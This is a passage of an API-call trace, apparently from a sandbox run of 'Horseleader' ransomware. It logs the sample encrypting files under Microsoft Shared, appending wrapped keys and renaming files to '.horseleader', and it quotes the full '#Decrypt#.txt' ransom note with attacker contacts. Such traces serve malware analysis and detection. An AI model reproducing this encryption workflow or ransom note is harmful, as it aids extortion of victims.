shared\\officesoftwareprotectionplatform\\osppwmi.dll.horseleader")) returned 1 [0245.395] GetProcessHeap () returned 0x780000 [0245.395] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.395] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb169e000, ftCreationTime.dwHighDateTime=0x1ca911f, ftLastAccessTime.dwLowDateTime=0x6c23c830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb169e000, ftLastWriteTime.dwHighDateTime=0x1ca911f, nFileSizeHigh=0x0, nFileSizeLow=0xba5e, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="OSPPWMI.MOF", cAlternateFileName="")) returned 1 [0245.395] lstrcmpiW (lpString1="OSPPWMI.MOF", lpString2="Windows") returned -1 [0245.395] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.MOF") returned 95 [0245.395] StrStrIW (lpFirst="OSPPWMI.MOF", lpSrch=".horseleader") returned 0x0 [0245.395] lstrcmpW (lpString1="OSPPWMI.MOF", lpString2="#Decrypt#.txt") returned 1 [0245.395] lstrcmpW (lpString1="OSPPWMI.MOF", lpString2="_uninstalling_.png") returned 1 [0245.395] lstrlenW (lpString=".testttjffg") returned 11 [0245.395] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.MOF", lpSrch=".testttjffg") returned 0x0 [0245.396] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.396] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.396] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.MOF" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppwmi.mof"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.396] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.MOF") returned 95 [0245.396] StrStrW (lpFirst="OSPPWMI.MOF", lpSrch=".txt") returned 0x0 [0245.396] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=47710) returned 1 [0245.396] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.418] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.418] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.418] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.418] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.419] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.419] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1a5e, lpOverlapped=0x0) returned 1 [0245.419] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe5a2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.419] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1a5e, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1a5e, lpOverlapped=0x0) returned 1 [0245.419] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.419] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.419] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.420] CloseHandle (hObject=0x158) returned 1 [0245.420] GetProcessHeap () returned 0x780000 [0245.420] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.420] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.MOF.horseleader") returned 107 [0245.420] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.MOF" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppwmi.mof"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.MOF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppwmi.mof.horseleader")) returned 1 [0245.421] GetProcessHeap () returned 0x780000 [0245.421] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.421] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb169e000, ftCreationTime.dwHighDateTime=0x1ca911f, ftLastAccessTime.dwLowDateTime=0x6c23c830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb169e000, ftLastWriteTime.dwHighDateTime=0x1ca911f, nFileSizeHigh=0x0, nFileSizeLow=0xba5e, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="OSPPWMI.MOF", cAlternateFileName="")) returned 0 [0245.421] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0245.421] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\#Decrypt#.txt") returned 97 [0245.421] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0245.422] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0245.422] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0245.424] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0245.424] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0245.424] CloseHandle (hObject=0x21c) returned 1 [0245.424] GetProcessHeap () returned 0x780000 [0245.424] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0245.424] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b0da70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69e61cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69e61cd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="PROOF", cAlternateFileName="")) returned 1 [0245.424] lstrcmpiW (lpString1="PROOF", lpString2="Windows") returned -1 [0245.424] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF") returned 56 [0245.424] lstrcmpW (lpString1="PROOF", lpString2=".") returned 1 [0245.424] lstrcmpW (lpString1="PROOF", lpString2="..") returned 1 [0245.425] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0245.425] GetProcessHeap () returned 0x780000 [0245.425] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0245.425] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*") returned 58 [0245.425] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b0da70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69e61cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69e61cd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0245.426] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0245.426] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\.") returned 58 [0245.426] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0245.427] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b0da70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69e61cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69e61cd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0245.427] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0245.427] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\..") returned 59 [0245.427] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0245.427] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0245.427] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa07d0e00, ftCreationTime.dwHighDateTime=0x1ca2cea, ftLastAccessTime.dwLowDateTime=0x69e61cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa07d0e00, ftLastWriteTime.dwHighDateTime=0x1ca2cea, nFileSizeHigh=0x0, nFileSizeLow=0x90540, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSLID.DLL", cAlternateFileName="")) returned 1 [0245.427] lstrcmpiW (lpString1="MSLID.DLL", lpString2="Windows") returned -1 [0245.427] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSLID.DLL") returned 66 [0245.427] StrStrIW (lpFirst="MSLID.DLL", lpSrch=".horseleader") returned 0x0 [0245.427] lstrcmpW (lpString1="MSLID.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.427] lstrcmpW (lpString1="MSLID.DLL", lpString2="_uninstalling_.png") returned 1 [0245.427] lstrlenW (lpString=".testttjffg") returned 11 [0245.427] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSLID.DLL", lpSrch=".testttjffg") returned 0x0 [0245.428] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.428] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.428] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSLID.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mslid.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.428] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSLID.DLL") returned 66 [0245.428] StrStrW (lpFirst="MSLID.DLL", lpSrch=".txt") returned 0x0 [0245.428] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=591168) returned 1 [0245.429] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.429] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.435] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.435] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.436] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x45aa0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.436] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.438] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.439] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.439] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x8b540, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.439] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.441] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.441] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.442] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.442] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.442] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.442] CloseHandle (hObject=0x158) returned 1 [0245.442] GetProcessHeap () returned 0x780000 [0245.442] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.442] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSLID.DLL.horseleader") returned 78 [0245.443] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSLID.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mslid.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSLID.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mslid.dll.horseleader")) returned 1 [0245.444] GetProcessHeap () returned 0x780000 [0245.444] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.444] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x782b2c00, ftCreationTime.dwHighDateTime=0x1bada3f, ftLastAccessTime.dwLowDateTime=0x98a53b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x782b2c00, ftLastWriteTime.dwHighDateTime=0x1bada3f, nFileSizeHigh=0x0, nFileSizeLow=0x6c67b, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSWDS_EN.LEX", cAlternateFileName="")) returned 1 [0245.444] lstrcmpiW (lpString1="MSWDS_EN.LEX", lpString2="Windows") returned -1 [0245.444] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX") returned 69 [0245.444] StrStrIW (lpFirst="MSWDS_EN.LEX", lpSrch=".horseleader") returned 0x0 [0245.444] lstrcmpW (lpString1="MSWDS_EN.LEX", lpString2="#Decrypt#.txt") returned 1 [0245.444] lstrcmpW (lpString1="MSWDS_EN.LEX", lpString2="_uninstalling_.png") returned 1 [0245.444] lstrlenW (lpString=".testttjffg") returned 11 [0245.444] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX", lpSrch=".testttjffg") returned 0x0 [0245.444] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.445] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.445] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_en.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.446] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX") returned 69 [0245.446] StrStrW (lpFirst="MSWDS_EN.LEX", lpSrch=".txt") returned 0x0 [0245.446] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=444027) returned 1 [0245.446] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.446] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.449] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.449] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.450] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x33b3d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.450] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.451] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.451] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.451] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x6767b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.451] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, 